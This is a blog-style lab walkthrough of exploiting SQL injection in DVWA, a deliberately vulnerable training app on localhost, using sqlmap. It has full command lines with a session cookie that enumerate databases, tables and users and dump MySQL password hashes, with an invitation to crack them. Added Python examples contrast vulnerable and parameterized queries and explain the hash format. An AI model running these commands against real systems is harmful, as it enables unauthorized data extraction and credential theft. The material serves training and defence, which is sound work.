October 19, 2011

Owning DVWA SQLi with sqlmap


Here we go... finally writing this post on SQL injection on DVWA. I was caught up with some really boring office (day job) work and some other things on top of that. But that has always been the case with my blogging. It's a sad story.

In this post I will explain the exploitation of the SQL injection vulnerability present in DVWA. For details on DVWA and how to get it, please see my previous post.


SQLMAP:
sqlmap is an automatic SQL injection and database takeover tool. It is capable of enumerating entire remote databases and performing active database fingerprinting.
Get sqlmap from: http://sqlmap.sourceforge.net/

I am documenting the steps I carried out to pwn DVWA. You are free to experiment with the different options and parameters of sqlmap; it is a great tool.


Looking for SQL injection in the webapp:
The best way to detect SQL injection in a webapp is to look at its URL. If you can change a parameter passed in the URL and that change is reflected in the output of the webapp, you can say that the parameter is being passed to the database at the backend. You then need to verify whether it really allows you to inject SQL.
The URL of the DVWA SQLi page is:
http://localhost/dvwa/vulnerabilities/sqli/

After we enter a value (e.g. 1) in the text box, the result is displayed on the page and the URL becomes:
http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

We can see that changing the value of the parameter in the URL gives different results.
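The check described above (change the parameter, watch the output, then confirm that a quote changes the meaning of the query) is shown here as an added example; it is not code from this post or from DVWA. It uses an in-memory SQLite table with constructed rows in place of DVWA's MySQL `users` table, and puts the string-built query that DVWA's "low" level uses next to its parameterized replacement, so you can see why sqlmap succeeds against one and not the other.

```python
import sqlite3

# Constructed sample data standing in for a DVWA-like users table (assumption:
# this is not DVWA's real schema or data, only enough to show the behaviour).
SAMPLE_USERS = [
    (1, "admin", "Admin"),
    (2, "gordonb", "Gordon"),
    (3, "1337", "Hack"),
]


def build_db():
    """In-memory SQLite database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, user TEXT, first_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Pattern behind DVWA's 'low' SQLi page: the id parameter is spliced
    straight into the SQL text, so quotes in the value become SQL syntax."""
    query = f"SELECT first_name, user FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, user_id):
    """Hardened form: the value is bound as a parameter and is never parsed
    as SQL, whatever characters it contains."""
    return conn.execute(
        "SELECT first_name, user FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


def is_injectable(lookup, conn, benign_id="1"):
    """The verification step the post describes: confirm the parameter reaches
    the database, then check whether a quote changes the query's meaning.
    Returns True when the lookup is injectable."""
    baseline = lookup(conn, benign_id)
    if len(baseline) != 1:
        return False  # parameter does not select a single row; nothing to compare

    # A lone quote breaks the SQL grammar only if it is parsed as SQL.
    try:
        lookup(conn, benign_id + "'")
    except sqlite3.Error:
        return True

    # If errors are swallowed, a tautology widens the WHERE clause only when
    # the value is parsed as SQL; a bound parameter still matches nothing.
    widened = lookup(conn, benign_id + "' OR '1'='1")
    return len(widened) > len(baseline)


if __name__ == "__main__":
    db = build_db()
    print("string-built query injectable:", is_injectable(lookup_vulnerable, db))
    print("parameterized query injectable:", is_injectable(lookup_parameterized, db))
```

Run it and the string-built lookup reports injectable while the parameterized one does not; the parameterized version still returns the right row for `1`, which is the point: the fix costs nothing in functionality.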
Now, let's check whether this page is vulnerable to SQLi using sqlmap.

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"

This command can be used to test standalone web pages for SQLi, but in our case, because we are testing a page behind a login, we are redirected to login.php as we are not authenticated. To avoid this, we can use the --cookie flag of sqlmap.
We need to provide the value of the cookie set after we have logged in to DVWA. The cookie value can be found using tools like Burp Suite, WebScarab, etc.

After finding the cookie value, issue the following command:


./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --dbs


The --dbs flag lists the database names if the SQLi is successful.

sqlmap returns with goodies :)


--snip--
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

We then try to enumerate the tables in one of the databases.
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" -D dvwa --tables
And we are not disappointed... :)


Database: dvwa

[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

You can continue to enumerate the target with the rich set of functionality provided by sqlmap. I will show you the mettle of sqlmap straight away ;)

We can see who the current user is:
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --current-user
current user:    'root@localhost'

or list all database users:
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --users
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-desktop'
[*] 'root'@'localhost'

Now that you have the list of users, you will want to know their passwords as well. That is why sqlmap provides the --passwords flag ;)

./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=bb61j7e8jrsg1r15b6c3sfsk23" --users --passwords

database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *3F436344A61D99410B1DD47F05788FD5DD72E483
[*] root [1]:
    password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

Crack these hashes and enjoy ;)
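A note on what sqlmap just printed, with an added example that is not part of the post. The `*` followed by 40 hex digits is MySQL's mysql_native_password format: SHA-1 applied twice to the password, with no salt, so equal passwords give equal hashes and each offline guess costs two SHA-1 computations. The reason sqlmap could read these at all is that the webapp connects as root@localhost and can therefore read mysql.user; an application account limited to the dvwa database would have stopped the --users and --passwords steps even with the injection in place. The code below reproduces the hash format and checks a candidate against it; the "password" value is a constructed example, and the two hashes are the ones from the output above, used only to show format recognition.

```python
import hashlib
import hmac


def mysql_native_hash(password: str) -> str:
    """Reproduce the mysql_native_password format sqlmap printed:
    '*' followed by SHA1(SHA1(password)) as 40 upper-case hex digits.
    No salt is involved, so identical passwords hash identically."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def looks_like_mysql_native_hash(value: str) -> bool:
    """Recognise the format in a dump or log: '*' plus 40 hex digits."""
    body = value[1:]
    return (
        len(value) == 41
        and value.startswith("*")
        and all(c in "0123456789ABCDEF" for c in body)
    )


def verify(password: str, stored_hash: str) -> bool:
    """Constant-time comparison of a candidate password against a stored hash."""
    return hmac.compare_digest(mysql_native_hash(password), stored_hash.upper())


# Hashes copied from the sqlmap output above, for format recognition only.
PAGE_HASHES = {
    "debian-sys-maint": "*3F436344A61D99410B1DD47F05788FD5DD72E483",
    "root": "*263027ECC84AA7B81EA86B0EBECAFE20BC8804FC",
}

if __name__ == "__main__":
    for user, stored in PAGE_HASHES.items():
        print(user, "native-format hash:", looks_like_mysql_native_hash(stored))
    # Constructed example: the hash MySQL stores for the password "password".
    print(mysql_native_hash("password"))
```

The practical takeaway for the defender is the privilege boundary, not the hash: newer authentication plugins (caching_sha2_password) slow guessing down, but a web application account that cannot read mysql.user never hands these hashes over in the first place.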


